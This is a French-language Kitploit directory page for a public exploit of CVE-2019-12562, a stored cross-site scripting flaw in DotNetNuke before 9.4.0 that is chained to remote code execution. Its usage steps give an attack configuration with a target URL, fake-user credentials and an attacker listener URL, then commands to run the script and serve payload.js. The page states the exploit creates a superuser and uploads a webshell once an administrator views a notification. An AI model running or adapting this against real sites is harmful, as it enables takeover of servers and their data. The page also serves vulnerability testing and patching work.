Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/mayaseven/cve-2019-12562
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

Cross-Site Scripting stocké dans DotNetNuke (DNN) version antérieure à 9.4.0 | XSS vers RCE

Voir le dépôt
84il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-12562

CVE-2019-12562 Le Cross-Site Scripting stocké dans DotNetNuke (DNN) version antérieure à 9.4.0 permet à des attaquants distants de stocker et d'intégrer le script malveillant dans la page de notification d'administration. L'exploit pourrait être utilisé pour effectuer toute action avec les privilèges d'administrateur, comme gérer le contenu, ajouter des utilisateurs, téléverser des backdoors sur le serveur, etc. L'exploitation réussit lorsqu'un administrateur visite une page de notification contenant le cross-site scripting stocké.

Exploitation

  • Configurer le fichier de l'exploit
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
  • Exécuter l'exploit : si la cible est vulnérable, l'exploit enregistrera un utilisateur factice avec du XSS attaché dans le champ "Display Name" et vous obtiendrez payload.js.
root@kitploit:~
python3 CVE-2019-12562.py
  • Vous devez exécuter le serveur web et y placer payload.js pour attendre la connexion de l'administrateur.
root@kitploit:~
python -m SimpleHTTPServer 1337

Cet exploit créera un superutilisateur et téléversera un webshell sur le serveur cible

Condition de l'exploit : L'exploitation réussit lorsqu'un administrateur visite une page de notification.

En savoir plus : https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Référence CVE : https://www.cvedetails.com/cve/CVE-2019-12562/

Télécharger l’outil